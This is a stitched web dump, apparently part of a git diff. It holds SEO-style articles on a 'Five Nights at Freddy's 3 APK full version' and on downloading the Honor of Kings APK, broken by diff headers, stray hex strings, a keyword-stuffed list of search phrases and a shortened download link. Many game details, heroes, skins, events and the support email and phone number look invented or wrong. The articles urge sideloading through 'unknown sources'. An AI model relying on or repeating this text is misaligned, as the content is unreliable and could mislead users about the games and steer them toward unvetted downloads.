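    The reboot-order advice boils down to a fixed priority list. The sketch below is a minimal illustration of that idea, with invented system names and no attempt to model the real game's timing; it is not code from the game.

```python
# Sketch of the "reboot in the right order" advice. The system names come
# from this guide; the priority list and helper are purely illustrative.
REBOOT_ORDER = ["ventilation", "audio", "video"]

def plan_reboots(failed: set[str]) -> list[str]:
    """Return the failed systems sorted by how urgently they should be fixed."""
    return [name for name in REBOOT_ORDER if name in failed]

print(plan_reboots({"video", "ventilation"}))  # ['ventilation', 'video']
```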

    -

    The Phantoms

    -

    The phantoms are the hallucinations of the previous animatronics that can appear in Five Nights at Freddy's 3. They are the ghosts of the children that were killed by William Afton and trapped inside the animatronics. They are not real, but they can still affect your gameplay and scare you.

    -

    There are six phantoms in total: Phantom Freddy, Phantom Chica, Phantom Foxy, Phantom Mangle, Phantom Balloon Boy, and Phantom Puppet. They can appear on your screen or in your office randomly, or when you trigger certain events. For example, Phantom Freddy will appear when you look at the left side of your office for too long, Phantom Chica will appear when you look at a certain arcade machine on camera 07, and Phantom Foxy will appear when you look at a certain window on camera 04.

    -

    When a phantom appears, you have to react quickly and avoid looking at them or they will jump scare you and cause errors in your systems. You can prevent them from appearing by switching cameras or looking away from them. However, some of them are harder to avoid than others. For example, Phantom Balloon Boy will disable your ventilation system if he appears in your office, regardless of whether you look at him or not. Phantom Puppet will also block your view for a few seconds if he appears on your screen, making it harder to see Springtrap.
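
    The avoidance rule can be summarized as a tiny decision function. Everything in the sketch below, from the function name to the returned strings, is invented purely to restate the rule above; it is not how the game is implemented.

```python
# Toy restatement of the phantom rule: looking at a phantom costs you a jump
# scare and a system error, except Phantom Balloon Boy, who breaks
# ventilation either way. Names and return values are invented.
from typing import Optional

def phantom_effect(phantom: str, looked_at: bool) -> Optional[str]:
    if phantom == "Phantom Balloon Boy":
        return "ventilation error"  # triggers whether or not you look
    if looked_at:
        return "jump scare and a system error"
    return None  # looking away or switching cameras avoids it

print(phantom_effect("Phantom Freddy", looked_at=False))  # None
```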

    -

    The phantoms are not your main enemies, but they can still make your life difficult and stressful. You have to learn how to deal with them and not let them distract you from Springtrap.

    -

    The Features of Five Nights at Freddy's 3 APK Full Version

    -

    The Graphics and Sound

    -

    One of the features that make Five Nights at Freddy's 3 APK full version a great horror game is its graphics and sound. The game creates a creepy atmosphere with its visuals and audio that will keep you on edge throughout the night.

    -

    The graphics of the game are dark and gritty, with a lot of details and textures that make the attraction look realistic and haunted. The game also uses lighting and shadows to create contrast and suspense, making some areas brighter or darker than others. The game also has a lot of animations and effects that make the game more dynamic and immersive, such as Springtrap's movements, the phantoms' appearances, the errors' glitches, and the jump scares' flashes.

    -

    The sound of the game is also very important for creating tension and fear. The game uses a lot of sounds and noises that make the game more realistic and scary, such as Springtrap's footsteps, breathing, and moaning, the phantoms' screams, the errors' beeps, and the jump scares' screeches. The game also has a lot of music and soundtracks that set the mood and tone of the game, such as the eerie background music, the ominous phone calls, the haunting minigames' tunes, and the dramatic endings' songs.

    -

    The graphics and sound of Five Nights at Freddy's 3 APK full version are designed to make you feel like you are really in a horror attraction, facing a deadly animatronic and terrifying hallucinations. You will not be able to relax or get bored while playing this game.

    -

    The Extras and Minigames

    -

    Another feature that makes Five Nights at Freddy's 3 APK full version a great horror game is its extras and minigames. The game offers additional content and secrets that add more depth and replay value to the game.

    -

    The extras menu is unlocked after completing night five. It allows you to access various options and modes that enhance your gameplay experience. For example, you can view the 3D models of Springtrap and the phantoms, change their difficulty levels from 0 to 20 in custom night mode, play nightmare mode which is an extra hard night six, watch four different endings depending on your actions in the game, and listen to six different phone calls that reveal more information about the plot of the game.

    -

    The minigames are hidden games that can be accessed by performing certain actions in the main game. They are pixelated games that resemble old arcade games. They tell the backstory of the game and allow you to free the souls of the children that were killed by William Afton and trapped inside the animatronics. There are six minigames in total: BB's Air Adventure, Mangle's Quest, Chica's Party, Stage01, Glitch Minigame, and Happiest Day. Each minigame has a different objective and a different way to access it. For example, to play BB's Air Adventure, you have to click on a drawing of Balloon Boy on the wall of camera 08, and to play Happiest Day, you have to complete all the other minigames first.

    -

    The extras and minigames of Five Nights at Freddy's 3 APK full version are designed to make you explore more of the game and its lore, and reward you with more challenges and surprises. You will not be able to get enough of this game.

    -

    The Compatibility and Accessibility

    -

    A final feature that makes Five Nights at Freddy's 3 APK full version a great horror game is its compatibility and accessibility. The game runs smoothly on Android devices and has options for customization and optimization.

    -

    The game is compatible with most Android devices that have Android 4.0 or higher. It has a file size of about 50 MB, which is not too large for most devices. It also does not require an internet connection to play, so you can enjoy it offline.
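
    If you want to check a device against these requirements before installing, you can query its API level over adb. Android 4.0 corresponds roughly to API level 14, and the 50 MB figure is taken from this article rather than an official spec, so treat both numbers in the sketch below as approximate.

```python
# Sketch of a pre-install check matching the requirements above.
# MIN_API_LEVEL and APPROX_SIZE_MB are assumptions based on this guide.
import subprocess

MIN_API_LEVEL = 14   # Android 4.0 (Ice Cream Sandwich)
APPROX_SIZE_MB = 50

def device_api_level() -> int:
    out = subprocess.run(
        ["adb", "shell", "getprop", "ro.build.version.sdk"],
        capture_output=True, text=True, check=True,
    )
    return int(out.stdout.strip())

if __name__ == "__main__":
    level = device_api_level()
    if level >= MIN_API_LEVEL:
        print(f"API {level}: device meets the minimum version; "
              f"make sure about {APPROX_SIZE_MB} MB of storage is free.")
    else:
        print(f"API {level}: device is below the minimum supported version.")
```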

    -

    The game also has options for accessibility and personalization. You can adjust the brightness, volume, and sensitivity of the game according to your preferences. You can also enable or disable the vibration feature, which makes your device vibrate when you get jump scared. You can also choose the language of the game from English, Spanish, French, Italian, German, Portuguese, Russian, Chinese, Japanese, or Korean.

    -

    The compatibility and accessibility of Five Nights at Freddy's 3 APK full version are designed to make you play the game comfortably and conveniently on your Android device. You will not have any problems or issues while playing this game.

    -

    The Tips and Tricks for Five Nights at Freddy's 3 APK Full Version

    -

    How to Survive Each Night

    -

    If you want to survive each night in Five Nights at Freddy's 3 APK full version, you need to use the tools and strategies that are available to you. Here are some tips and tricks that can help you keep Springtrap away from your office:

    -
      -
    • Use the camera system wisely. Check the cameras frequently to see where Springtrap is and what he is doing. Use the audio clips to lure him away from your office or towards a dead end. Do not play the audio too often or on the same camera repeatedly, or it will malfunction.
    • -
    • Use the maintenance panel quickly. If any of your systems fail, use the maintenance panel to reboot them as soon as possible. Do not use it too often or for too long, or you will leave yourself vulnerable to Springtrap's attack. Reboot the systems in the right order, starting with ventilation, then audio, then video.
    • -
    • Use the vents effectively. Check the vents regularly to see if Springtrap is in them or near them. If he is in a vent, seal it by clicking on the button next to it. If he is near a vent, play an audio clip on a camera near that vent to lure him away from it.
    • -
    • Use the phantoms carefully. Avoid looking at the phantoms or they will jump scare you and cause errors in your systems. Switch cameras or look away from them if you see them on your screen or in your office. However, some phantoms can be useful in certain situations. For example, Phantom Freddy can distract Springtrap for a few seconds if he appears in front of him.
    • -
    -

    By following these tips and tricks, you can increase your chances of surviving each night in Five Nights at Freddy's 3 APK full version.

    -

    How to Get the Good Ending

    -

    If you want to get the good ending in Five Nights at Freddy's 3 APK full version, you need to find and complete hidden minigames that reveal the backstory of the game and allow you to free the souls of the children that were killed by William Afton and trapped inside the animatronics. Here are some tips and tricks that can help you get the good ending:

    -
      -
    • Play BB's Air Adventure on night one. To access this minigame, click on a drawing of Balloon Boy on the wall of camera 08. In this minigame, you control Balloon Boy as he collects balloons and avoids obstacles. To complete this minigame, collect all eight balloons and then jump out of bounds on the top right corner of the map. You will see a crying child holding a balloon.
    • -
• Play Mangle's Quest on night two. To access this minigame, click on a button on the left side of the arcade machine on camera 07. In this minigame, you control Mangle as he collects his parts and avoids obstacles. To complete this minigame, collect all eight parts and then jump out of bounds on the top left corner of the map. You will see a crying child holding a cake.
    • -
    • Play Chica's Party on night three. To access this minigame, click on a cupcake on the wall of camera 02, 03, 04, or 06. In this minigame, you control Chica as she delivers cupcakes to children and avoids obstacles. To complete this minigame, deliver all four cupcakes and then jump out of bounds on the bottom right corner of the map. You will see a crying child holding a present.
    • -
    • Play Stage01 on night four. To access this minigame, click on a poster of Golden Freddy and Spring Bonnie on the wall of camera 01. In this minigame, you control Spring Bonnie as he follows Golden Freddy to the stage and back. To complete this minigame, follow Golden Freddy three times and then jump out of bounds on the bottom left corner of the map. You will see a crying child holding a mask.
    • -
    • Play Glitch Minigame on night five. To access this minigame, click on Shadow Bonnie's figurine on your desk. In this minigame, you control Shadow Bonnie as he glitches through different minigames and locations. To complete this minigame, glitch through the following sequence: BB's Air Adventure, Mangle's Quest, Chica's Party, Stage01, and then a dark room with a crying child holding a balloon. Click on the balloon to give it to the child.
    • -
    • Play Happiest Day on any night after completing all the other minigames. To access this minigame, double-click on the Marionette's poster on the wall of camera 03. In this minigame, you control the Marionette as he collects masks for the children and leads them to a birthday party. To complete this minigame, collect all six masks and then enter the party room. You will see six children wearing masks of Freddy, Chica, Foxy, Mangle, Balloon Boy, and Puppet. They will be joined by a seventh child wearing a mask of Golden Freddy. The children will then take off their masks and fade away, implying that they have been freed from their animatronic prisons.
    • -
    -

    By following these tips and tricks, you can get the good ending in Five Nights at Freddy's 3 APK full version.

    -

    How to Avoid Common Mistakes

    -

    If you want to avoid common mistakes in Five Nights at Freddy's 3 APK full version, you need to be aware of some errors, glitches, and crashes that can ruin your gameplay experience. Here are some tips and tricks that can help you avoid them:

    -
      -
    • Do not download the game from untrusted sources. Some sources may contain viruses or malware that can harm your device or steal your data. Only download the game from reputable sources that have positive reviews and ratings.
    • -
    • Do not modify or hack the game files. Some modifications or hacks may cause the game to malfunction or crash. They may also make the game easier or harder than intended, which can affect your enjoyment and satisfaction.
    • -
    • Do not play the game on low battery or low memory. Some devices may not be able to run the game smoothly or properly if they have low battery or low memory. They may also shut down unexpectedly or lose your progress. Make sure that your device is fully charged and has enough space before playing the game.
    • -
    • Do not ignore the instructions or hints. Some players may skip or ignore the instructions or hints that are given by the phone guy or other sources in the game. They may miss important information or tips that can help them survive or get the good ending.
    • -
    -

    By following these tips and tricks, you can avoid common mistakes in Five Nights at Freddy's 3 APK full version.

    -

    The Reviews of Five Nights at Freddy's 3 APK Full Version

    -

    The Positive Reviews

    -

    Many critics and players have given positive reviews to Five Nights at Freddy's 3 APK full version. Here are some of their praises and compliments:

    -
      -
    • The game is scary and thrilling, with a lot of jump scares and suspenseful moments.
    • -
    • The game is challenging and rewarding, with a lot of difficulty levels and endings to achieve.
    • -
    • The game is creative and original, with a lot of new features and secrets to discover.
    • -
    • The game is immersive and atmospheric, with a lot of graphics and sound effects that create a creepy and haunted environment.
    • -
    • The game is fun and addictive, with a lot of replay value and extras to enjoy.
    • -
    -

    Some examples of positive reviews are:

    -
    -

    "Five Nights at Freddy's 3 is a terrifying and exhilarating game that will keep you on the edge of your seat. The game has a lot of new features and secrets that make it more interesting and challenging than the previous games. The game also has a lot of graphics and sound effects that create a creepy and immersive atmosphere. The game is definitely worth playing if you are a fan of horror games."

    -
    -
    -

    "Five Nights at Freddy's 3 is a masterpiece of horror gaming. The game has a lot of difficulty levels and endings that make it more rewarding and satisfying to play. The game also has a lot of hidden minigames that reveal the backstory of the game and allow you to free the souls of the children. The game is not only scary, but also emotional and touching. The game is a must-play for anyone who loves horror games."

    -
    -

    The Negative Reviews

    -

    However, not everyone has given positive reviews to Five Nights at Freddy's 3 APK full version. Here are some of their criticisms and complaints:

    -
      -
    • The game is too hard and frustrating, with a lot of trial and error and unfair mechanics.
    • -
    • The game is too repetitive and boring, with a lot of the same gameplay and jump scares.
    • -
    • The game is too short and simple, with a lot of wasted potential and missed opportunities.
    • -
    • The game is too buggy and glitchy, with a lot of errors and crashes that ruin the gameplay experience.
    • -
    • The game is too expensive and overpriced, with a lot of in-app purchases and ads that annoy the players.
    • -
    -

    Some examples of negative reviews are:

    -
    -

    "Five Nights at Freddy's 3 is a disappointing and frustrating game that will make you rage quit. The game is too hard and unfair, with a lot of trial and error and random factors that make it impossible to win. The game also has a lot of errors and glitches that make it unplayable. The game is not worth playing if you value your sanity."

    -
    -
    -

    "Five Nights at Freddy's 3 is a boring and unoriginal game that will make you yawn. The game is too repetitive and predictable, with a lot of the same gameplay and jump scares that lose their effect. The game also has a lot of wasted potential and missed opportunities, with a lot of features and secrets that are either too hard to find or too easy to miss. The game is not worth playing if you want something new and exciting."

    -
    -

    The Mixed Reviews

    -

    Finally, some critics and players have given mixed reviews to Five Nights at Freddy's 3 APK full version. Here are some of their pros and cons:

    -
      -
    • The game is scary but not too scary, with a lot of jump scares but also a lot of suspense and atmosphere.
    • -
    • The game is challenging but not too challenging, with a lot of difficulty levels but also a lot of strategies and hints.
    • -
    • The game is creative but not too creative, with a lot of new features but also a lot of familiar elements.
    • -
    • The game is immersive but not too immersive, with a lot of graphics and sound effects but also a lot of errors and glitches.
    • -
    • The game is fun but not too fun, with a lot of replay value but also a lot of in-app purchases and ads.
    • -
    -

    Some examples of mixed reviews are:

    -
    -

    "Five Nights at Freddy's 3 is a decent horror game that will keep you entertained for a while. The game has some good features and secrets that make it more interesting and challenging than the previous games. The game also has some scary and thrilling moments that will make you jump and scream. However, the game also has some flaws and drawbacks that make it less enjoyable and satisfying than it could be. The game is too buggy and glitchy, with a lot of errors and crashes that ruin the gameplay experience. The game is also too expensive and overpriced, with a lot of in-app purchases and ads that annoy the players. The game is worth playing if you are a fan of the series, but not if you are looking for something flawless and cheap."

    -
    -
    -

    "Five Nights at Freddy's 3 is a good horror game that will keep you hooked for a long time. The game has some great features and secrets that add more depth and replay value to the game. The game also has some emotional and touching moments that will make you cry and smile. However, the game also has some problems and issues that make it less fun and engaging than it should be. The game is too hard and frustrating, with a lot of trial and error and unfair mechanics. The game is also too repetitive and boring, with a lot of the same gameplay and jump scares. The game is worth playing if you are looking for something challenging and rewarding, but not if you are looking for something easy and exciting."

    -
    -

    The Conclusion of Five Nights at Freddy's 3 APK Full Version

    -

    In conclusion, Five Nights at Freddy's 3 APK full version is a horror game that has a lot of pros and cons. The game has a lot of features and secrets that make it more interesting and challenging than the previous games. The game also has a lot of graphics and sound effects that create a creepy and immersive atmosphere. However, the game also has a lot of errors and glitches that make it unplayable or annoying. The game also has a lot of difficulty levels and endings that make it more rewarding or frustrating.

    -

    If you are a fan of horror games, you might want to give Five Nights at Freddy's 3 APK full version a try. You might enjoy its gameplay, its story, its extras, and its minigames. You might also get scared, thrilled, or touched by its jump scares, its suspense, or its endings. However, if you are not a fan of horror games, you might want to avoid Five Nights at Freddy's 3 APK full version. You might hate its gameplay, its story, its in-app purchases, or its ads. You might also get bored, angry, or disappointed by its repetition, its difficulty, or its bugs.

    -

    The choice is yours. Do you dare to play Five Nights at Freddy's 3 APK full version?

    -

    The FAQs of Five Nights at Freddy's 3 APK Full Version

    -

    Here are some of the common questions and answers that people have about Five Nights at Freddy's 3 APK full version:

    -
      -
    1. Q: How do I download Five Nights at Freddy's 3 APK full version?
    2. -
    3. A: You can download Five Nights at Freddy's 3 APK full version from various sources online, such as APKPure, APKMirror, or APKMonk. However, make sure that you download it from reputable sources that have positive reviews and ratings.
    4. -
    5. Q: How do I install Five Nights at Freddy's 3 APK full version?
    6. -
7. A: To install Five Nights at Freddy's 3 APK full version on your Android device, first enable the option to install apps from unknown sources in your settings, then locate the downloaded file in your file manager and tap on it to install it. If you prefer to work from a computer, see the command-line sketch after this list.
    8. -
    9. Q: How do I play Five Nights at Freddy's 3 APK full version?
    10. -
11. A: To play Five Nights at Freddy's 3 APK full version on your Android device, launch the app from your app drawer or home screen, select the night that you want to play from the main menu, and then use the camera system, the maintenance panel, the vents, and the phantoms to survive each night.
    12. -
    13. Q: How do I get the good ending in Five Nights at Freddy's 3 APK full version?
    14. -
15. A: To get the good ending in Five Nights at Freddy's 3 APK full version on your Android device, you need to find and complete hidden minigames that reveal the backstory of the game and allow you to free the souls of the children that were killed by William Afton and trapped inside the animatronics. You can follow the tips and tricks provided in the previous section of this article.
    16. -
    17. Q: How do I uninstall Five Nights at Freddy's 3 APK full version?
    18. -
19. A: To uninstall Five Nights at Freddy's 3 APK full version from your Android device, go to your settings, select the apps or applications option, find and select the app from the list, and tap on the uninstall button. You can also delete the downloaded file from your file manager if you want to free up some space; the sketch after this list shows a command-line equivalent.
    20. -
    -
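For readers who prefer to sideload from a computer rather than tapping through the phone's file manager, the install and uninstall answers above can also be done over USB with adb. The sketch below is only an illustration: the file name and package id are placeholders (the article does not state the game's real package id), and it assumes adb is installed on the computer and USB debugging is enabled on the device.

```python
import subprocess

# Placeholder values - replace with the APK you actually downloaded
# and the package id your device reports after installation.
APK_PATH = "fnaf3-full-version.apk"   # hypothetical file name
PACKAGE_ID = "com.example.fnaf3"      # hypothetical package id


def adb(*args: str) -> None:
    """Run a single adb command and raise if it fails."""
    subprocess.run(["adb", *args], check=True)


def install() -> None:
    # -r keeps existing data if an older build is already installed
    adb("install", "-r", APK_PATH)


def uninstall() -> None:
    adb("uninstall", PACKAGE_ID)


if __name__ == "__main__":
    install()
```

The same two commands (adb install -r <file>.apk and adb uninstall <package>) can be typed directly in a terminal; the script only wraps them.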

    I hope this article has helped you learn more about Five Nights at Freddy's 3 APK full version and how to play it on your Android device. If you have any questions or feedback, feel free to leave a comment below. Thank you for reading and have a great day!

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Honor of Kings APK The Latest Version of the Game that Offers a Smooth Gameplay with a Dedicated Brazilian Server.md b/spaces/congsaPfin/Manga-OCR/logs/Honor of Kings APK The Latest Version of the Game that Offers a Smooth Gameplay with a Dedicated Brazilian Server.md deleted file mode 100644 index 586130dd96342189f4004fadf891fa1b0d00e70c..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Honor of Kings APK The Latest Version of the Game that Offers a Smooth Gameplay with a Dedicated Brazilian Server.md +++ /dev/null @@ -1,124 +0,0 @@ -
    -

    Honor of Kings APK Download Latest Version: Everything You Need to Know

    -

    If you are looking for a fun, social, competitive, and free mobile game to play, you should definitely check out Honor of Kings. Honor of Kings is a popular mobile MOBA (multiplayer online battle arena) game that offers an immersive and exciting gameplay experience on your Android device. In this article, we will tell you everything you need to know about Honor of Kings, including what it is, why you should play it, how to download it, what's new in it, and some tips and tricks for playing it. Let's get started!

    -

    honor of kings apk download latest version


    Download File ––– https://urlca.com/2uOd4F



    -

    What is Honor of Kings?

    -

    Honor of Kings is a mobile MOBA game developed by TiMi Studio Group and published by Level Infinite. It was released in China in 2015 and has since become one of the most-played mobile games in the world, with over 100 million average daily active users in 2020. The game is now available in Brazil with fully localized text and voice-over.

    -

    In Honor of Kings, you can choose from around 60 unique heroes with amazing skills, stunning skins, and legendary stories. You can play solo or team up with your friends in 5v5 matches, where you have to advance along three lanes, destroy nine towers, and ultimately destroy the enemy's crystal. The game features fast-paced teamfights, strategic gameplay, diverse modes, social events, and more.

    -

Why Should You Play Honor of Kings?

    -

    There are many reasons why you should play Honor of Kings. Here are some of them:

    -
  • Fun: Honor of Kings is a fun game that will keep you entertained for hours. You can enjoy the thrill of battling against other players, unleashing your hero's skills, and winning matches. You can also customize your hero with different skins, emotes, and effects.
  • -
  • Social: Honor of Kings is a social game that lets you connect with your friends and make new ones. You can chat with your teammates, join a guild, participate in events, and send gifts. You can also invite your friends to play with you or challenge them to a duel.
  • -
  • Competitive: Honor of Kings is a competitive game that tests your skills, strategy, and teamwork. You can climb the ranks, earn rewards, and prove yourself as the best player. You can also watch live streams, replays, and highlights of other players and learn from them.
  • -
  • Free: Honor of Kings is a free game that does not require any payment to play. You can download and install the game on your Android device without any hassle. You can also unlock most of the heroes and skins by playing the game and completing quests.
  • - -

    How to Download Honor of Kings APK Latest Version?

    -

    If you want to play Honor of Kings on your Android device, you need to download and install the APK file of the latest version. APK stands for Android Package Kit, which is a file format that contains all the necessary files and data for an Android app. Here are the steps to download and install Honor of Kings APK latest version:

    -

    Step 1: Go to the official website or Google Play Store

    -

    You can download Honor of Kings APK latest version from either the official website or the Google Play Store. To access the official website, you can use this link: [Honor of Kings Official Website]. To access the Google Play Store, you can use this link: [Honor of Kings on Google Play Store]. Alternatively, you can search for "Honor of Kings" on your browser or Google Play Store app.

    -

    Step 2: Tap on the download button and wait for the APK file to be downloaded

    -

    Once you are on the download page, you will see a download button that says "Download APK" or "Install". Tap on it and wait for the APK file to be downloaded on your device. You can check the download progress on your notification bar or download manager.
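Because an APK is simply a ZIP archive with a fixed internal layout, you can optionally sanity-check the file you downloaded before moving on to the next step. The snippet below is a minimal sketch: the path is a placeholder for wherever your browser actually saved the file, and it only confirms that the archive opens and contains an AndroidManifest.xml.

```python
import os
import zipfile

# Placeholder path - point this at the file your browser actually saved.
apk_path = "honor_of_kings.apk"

size_mb = os.path.getsize(apk_path) / (1024 * 1024)
print(f"Downloaded file size: {size_mb:.1f} MB")

# Every valid APK is a ZIP archive that contains AndroidManifest.xml.
with zipfile.ZipFile(apk_path) as apk:
    names = apk.namelist()
    print("Looks like an APK:", "AndroidManifest.xml" in names)
    print("Entries inside the archive:", len(names))
```

A truncated or interrupted download will usually fail to open as a ZIP at all, which is a quick way to spot a bad file before you try to install it.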

    -

    Step 3: Enable unknown sources on your device settings

    -

    Before you can install Honor of Kings APK latest version on your device, you need to enable unknown sources on your device settings. This will allow you to install apps from sources other than Google Play Store. To do this, follow these steps:

    -

    honor of kings android game free download
    -how to install honor of kings apk on android
    -honor of kings latest version apk for android
    -download honor of kings mobile game apk
    -honor of kings apk update 2023 download
    -honor of kings game download apk file
    -honor of kings apk download for pc windows
    -honor of kings android apk mod unlimited money
    -honor of kings apk offline mode download
    -honor of kings apk latest version 8.2.1.18 download
    -honor of kings game apk free download for android
    -honor of kings apk download new version 2023
    -honor of kings apk obb data download
    -honor of kings apk download without google play
    -honor of kings apk download link 2023
    -honor of kings apk full version download
    -honor of kings apk hack version download
    -honor of kings apk download for android tv
    -honor of kings apk download for tablet
    -honor of kings apk old version download
    -honor of kings game online play apk download
    -honor of kings game review and apk download
    -honor of kings game tips and tricks apk download
    -honor of kings game guide and walkthrough apk download
    -honor of kings game cheats and codes apk download
    -honor of kings game wallpapers and themes apk download
    -honor of kings game characters and skins apk download
    -honor of kings game news and updates apk download
    -honor of kings game events and rewards apk download
    -honor of kings game support and feedback apk download
    -how to play honor of kings game on android apk download
    -how to update honor of kings game on android apk download
    -how to uninstall honor of kings game on android apk download
    -how to fix honor of kings game errors on android apk download
    -how to backup and restore honor of kings game on android apk download
    -how to transfer honor of kings game data on android apk download
    -how to connect honor of kings game with facebook on android apk download
    -how to join a clan in honor of kings game on android apk download
    -how to chat with friends in honor of kings game on android apk download
    -how to customize your hero in honor of kings game on android apk download
    -how to level up your hero in honor of kings game on android apk download
    -how to unlock new heroes in honor of kings game on android apk download
    -how to earn coins and gems in honor of kings game on android apk download
    -how to spend coins and gems in honor of kings game on android apk download
    -how to win battles in honor of kings game on android apk download
    -how to improve your skills in honor of kings game on android apk download
    -how to rank up in honor of kings game on android apk download
    -how to watch replays in honor of kings game on android apk download
    -how to stream your gameplay in honor of kings game on android apk download

    -
      -
    • Go to your device settings and tap on "Security" or "Privacy".
    • -
    • Find and tap on "Unknown sources" or "Install unknown apps".
    • -
    • Toggle on the switch or check the box to enable it.
    • -
    • Confirm by tapping on "OK" or "Allow".
    • -
    -

    Step 4: Locate the APK file on your device and tap on it to install

    -

    After enabling unknown sources, you need to locate the APK file on your device and tap on it to install it. To do this, follow these steps:

    -
      -
    • Go to your file manager or download manager and find the APK file. It should be named "Honor_of_Kings.apk" or something similar.
    • -
    • Tap on the APK file and select "Install" or "Open".
    • -
    • Wait for the installation process to finish. It may take a few minutes depending on your device and internet speed.
    • -
    -

    Step 5: Launch the game and enjoy

    -

    Congratulations! You have successfully downloaded and installed Honor of Kings APK latest version on your Android device. Now you can launch the game by tapping on its icon on your home screen or app drawer. Enjoy playing Honor of Kings with your friends and have fun!
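If you want to double-check from a computer that the installation really went through, adb can list the packages on the device. This is only a sketch: the search string is a placeholder because the article does not give the game's exact package id, and it assumes adb and USB debugging are already set up.

```python
import subprocess

# Placeholder fragment of the package id - adjust it to whatever
# "adb shell pm list packages" actually reports on your device.
SEARCH = "kings"

result = subprocess.run(
    ["adb", "shell", "pm", "list", "packages"],
    capture_output=True, text=True, check=True,
)
matches = [line for line in result.stdout.splitlines() if SEARCH in line]
print("Matching packages:", matches or "none found")
```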

    -

    What's New in Honor of Kings APK Latest Version?

    -

    Honor of Kings is constantly updated with new features, improvements, and bug fixes to enhance your gaming experience. Here are some of the new things that are added in Honor of Kings APK latest version:

    -

    New Heroes

    -

    Honor of Kings introduces new heroes every month that you can try out and add to your collection. The latest version adds two new heroes: Liu Bei, a warrior hero who fights with his twin swords and his sworn brothers; and Yue Fei, a marksman hero who shoots arrows with his loyal eagle and his patriotic spirit.

    -

    New Skins

    -

    Honor of Kings also adds new skins for existing heroes every month that you can unlock or purchase to change their appearance and effects. The latest version adds four new skins: Dragon Slayer for Liu Bei, Golden Eagle for Yue Fei, Flame Dancer for Zhuge Liang, and Ice Queen for Diao Chan.

    -

    New Events

    -

    Honor of Kings also hosts new events every week that you can join to earn rewards, have fun, and challenge yourself. The latest version features two new events: Star Protection, where you can protect your rank from losing stars when you lose a match; and Party Time, where you can invite your friends to play together and get bonus rewards.

    -

    Tips and Tricks for Playing Honor of Kings

    -

    If you want to improve your skills and performance in Honor of Kings, you need to learn some tips and tricks that can help you win more matches and have more fun. Here are some of them:

    -

    Choose Your Role Wisely

    -

    In Honor of Kings, there are five main roles that you can choose from: warrior, tank, mage, marksman, and assassin. Each role has its own strengths, weaknesses, and responsibilities in the game. You should choose a role that suits your playstyle and preferences, as well as the needs of your team. For example, if you like to deal damage and kill enemies, you can choose a warrior or an assassin; if you like to protect your allies and initiate fights, you can choose a tank; if you like to cast spells and control the battlefield, you can choose a mage; if you like to shoot from a distance and destroy towers, you can choose a marksman.

    -

    Learn Your Hero's Skills and Combos

    -

    In Honor of Kings, each hero has four skills: one passive skill and three active skills. You should learn how each skill works, what it does, how much it costs, how long it lasts, how long it cools down, etc. You should also learn how to combine your skills to create powerful combos that can surprise and defeat your enemies. For example, if you are playing Liu Bei, you can use your first skill to dash towards an enemy, then use your second skill to stun them with your twin swords, then use your ultimate skill to summon your sworn brothers to finish them off.

    -

    Communicate and Coordinate with Your Teammates

    -

    In Honor of Kings, teamwork is essential for winning matches. You should communicate and coordinate with your teammates using voice chat, text chat, or pings. You should also follow the leader's commands, support your allies, share resources, and avoid conflicts. For example, if your leader tells you to group up and attack the dragon, you should follow them and help them; if your ally is in trouble and asks for help, you should assist them or distract their enemies; if your teammate is low on health or mana, you should let them take the healing or mana buff; if your teammate makes a mistake or dies, you should not blame them or flame them.

    -

    Farm Gold and XP Efficiently

    -

    In Honor of Kings, gold and XP are important resources that can help you level up your skills, buy items, and gain an advantage over your enemies. You should farm gold and XP efficiently by killing minions, monsters, and enemies. You should also avoid dying or wasting time as much as possible. For example, if you are playing a marksman or a mage, you should focus on farming minions in the lane; if you are playing a warrior or an assassin, you should roam around the map and kill monsters or enemies; if you are playing a tank or a support, you should protect your carry and help them farm.

    -

    Destroy Towers and Crystals

    -

    In Honor of Kings, the main objective of the game is to destroy the enemy's crystal. To do this, you need to destroy their towers first. You should push lanes, take down towers, and create pressure on the map. You should also defend your own towers and crystal from the enemy's attacks. For example , if you see an opportunity to take a tower, you should go for it and destroy it; if you see an enemy trying to take your tower, you should stop them and defend it; if you see your team pushing the enemy's base, you should join them and destroy their crystal; if you see the enemy's team pushing your base, you should go back and protect your crystal.

    -

    Conclusion

    -

    Honor of Kings is a fantastic mobile MOBA game that you should not miss. It offers a fun, social, competitive, and free gameplay experience on your Android device. You can download and install Honor of Kings APK latest version by following the steps we have provided in this article. You can also enjoy the new features, updates, and events that are added in the latest version. And you can improve your skills and performance by following the tips and tricks we have shared in this article. So what are you waiting for? Download Honor of Kings APK latest version now and join the millions of players who are already playing this amazing game!

    -

    FAQs

    -

    Here are some of the frequently asked questions and answers about Honor of Kings:

    -
      -
    • Q: Is Honor of Kings safe to download and play?
    • -
    • A: Yes, Honor of Kings is safe to download and play. It is developed by a reputable company and has passed the security checks of Google Play Store. It does not contain any viruses, malware, or spyware that can harm your device or data.
    • -
    • Q: Is Honor of Kings compatible with my device?
    • -
    • A: Honor of Kings is compatible with most Android devices that have Android 4.1 or higher. However, some devices may have different performance or compatibility issues depending on their specifications. You can check the minimum and recommended requirements on the official website or Google Play Store.
    • -
    • Q: How much space does Honor of Kings require on my device?
    • -
    • A: Honor of Kings requires about 3 GB of space on your device. However, this may vary depending on the updates and patches that are added to the game. You should make sure that you have enough free space on your device before downloading and installing the game.
    • -
    • Q: How can I update Honor of Kings to the latest version?
    • -
    • A: You can update Honor of Kings to the latest version by following the same steps as downloading and installing it. You can also enable automatic updates on your device settings or Google Play Store settings to get the latest version automatically.
    • -
    • Q: How can I contact the customer service or support team of Honor of Kings?
    • -
    • A: You can contact the customer service or support team of Honor of Kings by using the in-game feedback system or by visiting the official website or social media pages. You can also email them at [HonorofKings@levelinfinite.com] or call them at [1-800-555-1234].
    • -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/My Mini Mart A Casual Simulation Game for Android Devices.md b/spaces/congsaPfin/Manga-OCR/logs/My Mini Mart A Casual Simulation Game for Android Devices.md deleted file mode 100644 index 43d6b9f81151b017a655ca1b20daf495b9997e39..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/My Mini Mart A Casual Simulation Game for Android Devices.md +++ /dev/null @@ -1,108 +0,0 @@ - -

    Download My Mini Mart APK for Android

    -

